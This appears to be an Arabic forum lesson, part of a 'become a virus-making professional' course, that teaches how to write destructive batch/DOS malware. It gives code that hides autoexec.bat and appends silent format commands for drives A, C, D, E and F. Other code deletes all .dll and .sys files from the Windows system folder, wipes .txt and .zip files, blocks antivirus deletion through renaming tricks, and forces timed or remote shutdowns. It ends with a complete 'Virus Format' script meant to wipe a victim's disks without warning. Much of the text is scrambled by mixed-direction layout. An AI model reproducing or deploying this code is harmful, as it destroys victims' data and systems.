2 امتداد. تغير Batchطريقة طريق :Dosعن الى startاذهب commandاكتب شاشة لك تفتح

فيها مكتوب سوداءcd:\windows تكتب الحالة هذه في انت

..cd تجعلها ان الى المر هذا كرر

الى تذهب المر هذا من تنتهي ما my cumputerبعد:) تختار )cثم

| الفيروس 4وضع هذا| اكتب و الدوس الى اذهب ثم فيةالمر

cd:\>copy virus.exe virus.comvirus تبعك الفيروس اسم هو

الى المتداد تغير com,scr,batوممكن و :*** مجربة و الطريقة من متأكد انا اخواني ملحظة

100ناجحة بل% المتداد تغير ليس ثاني شيء اكو الطريقة الفيروس حذف من الفيروسات مضادات منع

: كتالي الوقت نفس في ذكية و جدا سهلة

الى ادخل التالي اعمل كويس فيروس كونت مو انت الفيروس اسم ا فرض الفيروس ملف الى ادخل و الدوس

moodax.bat: التالي اكتب اذنren moodax.bat ~moodax*<virus.bat

ا طبع الفيروس حذف من شخص اي يمنع المر هذا من لكن للجواب التالي الدرس انتظروا اخواني السؤال اي او علمات يقبل ما الوندوز لنه فقط العلم اجل

معركة تحدث سوف لهذا الرقام و الحرف غير شيء... علقناها المضاد و الوندوز بين


: الرابع الدرس الفيروسات صناعة للحتراف

المقدمة : و مفاهيم بطرح قمت قد السابقة الدروس في مثل الدورة في علقة له ليس منها لبعض شروحات مع الفيروسي الذكاء و المتداد تغير و التشفير طريقة

تحدث ل الدرس هذا ان منه جزء ال اعطي لم اني صناعة نستطيع ل نحن كن ل الفيروسي الذكاء عن

لماذا ا طبع الدفاعية الملفات طريق عن ذكي فيروس

في فقط الفيروسي الذكاء خاصية تطبيق يمكننا اخواني لغة ليست الن ندرسها التي هذه و البرمجية اللغات

التشغيل نظم مكونات اهم احدى لكنه ا بتات برمجية !! في النوافذ نظام مستخدمي نسبة و القديمة و الحديثة

التي الفيروسات هذه بالقليل ليس عددهم العالم نظام الحاسب على هناك كان اذ ال تعمل ل نصنعها قسم في الول الدرس في اشرنا قد لنه السبب دوس

(( )) الملفات انه تعريف الول الجزء في المقدمة التشغيل نظام اوامر من حزمة ال ليست هي الدفاعية

الدوس ...

1: ا استخدام الكثر الكود اغلب يستخدمه كودات اعطيكم سوف الفقرة هذه في

الفيروسات مبرمجي1 الفايروس. على المضاد كشف لمنع الكود هذا

:PHPكود

call attrib h r c:autoexec.bat >nul

2 للفورمات. الكود هذا

:PHPكود

echo format a: /q /u /autotest >nul >>c:autoexec.bat

3 بالختصار. لكن للفورمات كود هذا

:PHPكود

echo & /autotest >nul >>c:autoexec.bat

الى القادم المر انسخ تعنى ألولى( الوتواكسك( الى انة الول الكود من معروف ا طبع

بتاع تحذير طلب بدون المر وتنفيذ اجراء تعنى الثانيةyes and NO

الول يحذرك ان لبد فورمات تعمل لما عارف لأانك الضحية يحذر ما بدون فورمات يعمل الفيرس نريد ونحن

ان ايضا ويعنى هذا عن المسئول هو الكود هذا اذن السى فى الوتواكسيك ملف الى يكون النسخ

4| القراص. كل فورمات كود |385هذا

:PHPكود

echo format c: /q /u /autotest >nul >>c:autoexec.bat

echo format d: /q /u /autotest >nul >>c:autoexec.bat

echo format e: /q /u /autotest >nul >>c:autoexec.bat

echo format f: /q /u /autotest >nul >>c:autoexec.bat

5: علجه. و التنازلي العد فيروس كود هذا

:PHPكود

echo off@

shutdown s من تنازلي يعد راح الفايروس فتحت اذا30 معاه يطلع تريد كنت اذا رسالة بدون ويطلع ثانية

غير وتوقيت رسالة

:PHPكود

echo off@

shutdown s t 30 c "message نغير" الى 30طبعا و الثوان messageعدد الرسالة الى

الشبكة على الجهاز اغلقecho off@

shutdown s t 15 c "message" m \\namecomputer نغير 15طبعا و الثوان عدد الى

message ونغير الرسالة الى namecomputerالى اغلقه المراد الجهاز

العلج :shutdown –a

2: ( ) المفصل الشرح مع الكودات من مجموعة لكن كودات بأعطائكم اقوم سوف الفقرة هذه عن اما

ا جد مفصل شرح مع1 التالي يعمل فيروسي كود كتابت اردت اذ

بالغاء ويقوم الضحية عندى الذي قرص على يدخل| تكست 391ملف اكس| ل مث اسمة

كود : اى وضع يمكنك dosملحظة على الفورمات غيرالقاعدة هذة

:PHPكود


echo< دوسى nul >>c:autoexec.batكود العملية كانت اذا اما تريد كنت ان يكرر الخير والسطر

القاعدة فتكون تحذيرية رسالة الغاء تتطلب

:PHPكود


echo/ دوسى autotest >nul >>c:autoexec.batكود قاعدة وضع ويمكنك تتطلب ان الخير السطر تكرار مع

مشتركة

:PHPكود

call attrib h r c:autoexec.bat >nulecho/ دوسى autotest >nul >>c:autoexec.batكود

echo< دوسى nul >>c:autoexec.batكود

احد فى رسالة هاعترض الكود كان انا كدة نفكر يعنى/ اضافة من فلبد autotestالسطور الرسالة لتفادى

التحذيرية

2 التالي يعمل فايروسي كود كتابت اردت اذ بالغاء ويقوم الضحية عندى الذي قرص على يدخل

تعترضها الفكرة هذة هل اكس ل مث اسمة تكست ملفتحذيرية رسالة

يال كما الكود يكون الولى القاعدة اتبع اذن ل بالطبع

:PHPكود

call attrib h r c:autoexec.bat >nulecho d: >nul >>c:autoexec.bat

echo Del x.txt >nul >>c:autoexec.bat

التحليل

:PHPكود


اسمة ملف والغاء الدريف لدخول الن ا انف ذكرنا ( باتكتب( كنت الدوس فى ل مث تكست اكس

c:/ press enter| المحث 373فيتحول للغاء:/ dالى| هاتكتب

d:/Del x.txt press enter وقد الدوسى الكود معنا اذن معنا اذن خطوتين على خطوة كام على بالعملية قمنا

للفيرس الساسى الكود ومعنا الخطوات وعد الكود يكون ان لبد الكود سطر عدد التالى نستنتج

+ ( ) تكمل + عاوز لو عدد اى اساسى واحد اثنين فيكون تانى لشىء الفيرس

:PHPكود


( اساسى(

:PHPكود

echo d: >nul >>c:autoexec.bat

( دى( الدريف على الدخول

:PHPكود

echo Del x.txt >nul >>c:autoexec.bat

( تكست( اكس امسة ملف الغاءتذكر :::::

:PHPكود

echo< الدوس nul >>c:autoexec.batكود

3. امتدادها التي الملفات كل الغاء اردت في txtاذالقرص

:PHPكود


echo Del *.txt >nul >>c:autoexec.bat

4. امتدادها التي الملفات كل الغاء اردت فيzipاذالقرص

:PHPكود


echo Del *.zip >nul >>c:autoexec.bat

5| النظام ملفات بالغاء يقوم :300كود تحليله| و

:PHPكود

@Echo offc:

cd %WinDir%Systemdeltree /y *.dll

cddeltree /y *.sys

تحليلة :c السى: على دخلنا

:PHPكود

cd %WinDir%System

الوندوز فى السيستم ملف على دخلنا

:PHPكود

deltree /y *.dll

المتداد ملفات كل DLLالغاء خاص. هي والتىبالوندوز

cd الولى\ العملية تنفيذ بعد خرجنا

:PHPكود

deltree /y *.sys

ملفات كل الغاء .sysو الوندوز. فى انه تعرف انت و التاريخ كود عدى ما كامل الكود هذا طريق عن التاريخ على يعتمد فيروس صنع استطيع ل

ايقاف على الكود هذا يعمل الدفاعية الملفات فورمات و C,D,E,Fالمضادات يمكنك اردت اذ و فقط

قرأت , انت انه اعتقد التشغيل اعادة كود و الضافة... الول و الثاني الدرس

:PHPكود

@Echo Virus Format@Echo www.3asfh.comvb

@Echo By RBG7call attrib h r c:autoexec.bat >nul

format c: /q /u /autotest >nul >>c:autoexec.batformat d: /q /u /autotest >nul >>c:autoexec.batformat e: /q /u /autotest >nul >>c:autoexec.batformat f: /q /u /autotest >nul >>c:autoexec.bat

shutdown sEnd

:PHPكود


Call نوع : من ملف في BatللتصالAttrib تغير : على يعمل بالدوس خاص امر هذا

ملف خصائصh : اخفاء

r قراءة : فقط جعلهc:\autoexec.bat عليه : التنفيذ المراد الملف

<nul يعمل : و الول الدرس في شروح المر هذا المستخدم سؤال عدم على

:PHPكود

format a: /q /u /autotest >nul >>c:autoexec.bat

Format الفورمات : امرa القرص: على يطبق Aالمر

/q : سريع

/u الساسية : الملفات بحذف يقوم/autotest الكود : بنقل يقوم جدا مهم المر هذا

< المطلوب الملف الى nulالمكتوب دون >> : من نقلسؤال

c:\autoexec.bat الكود : به يطبق سوف الذي الملف

echo off@shutdown s t 30 c "message نغير" الى 30طبعا

و الثوان messageعدد الرسالة الى الشبكة على الجهاز اغلق

@echo off المر : استخدام Echoعدم بعض في المر هذا وضع لمذا يسأل البعض اخوي

مما الكود بعده و المر يكتب و المبرمج يخطاء الحيان تنفيذ دون فقط القراءة الى اطفاء : shutdown sيأدي

الحاسبt : الوقت

ثانية : 30c رسالة : اظهارmessage تريد : التي الرسالة اكتب

:PHPكود

@Echo offc:

cd %WinDir%Systemdeltree /y *.dll

cddeltree /y *.sys

يكتب ل النظام تدمير لفيروس كامل كود هذا اخوي نعم امر ليس و كامل كود لنه السبب و واحد سطر في

ستصبح الربعة للمواضع متابعتك وبعد لن اخوتي كل منكم واطلب المدمرة الفيروسات صنع في محترف

في ويضعه فايروسه كود يصنع بان المواضيع تابع من تطويره اجل من الفايروس للصنع بالكودات خاص قسم

اخوكم mr_shark96

Documents

احترف صناعة الفايروسات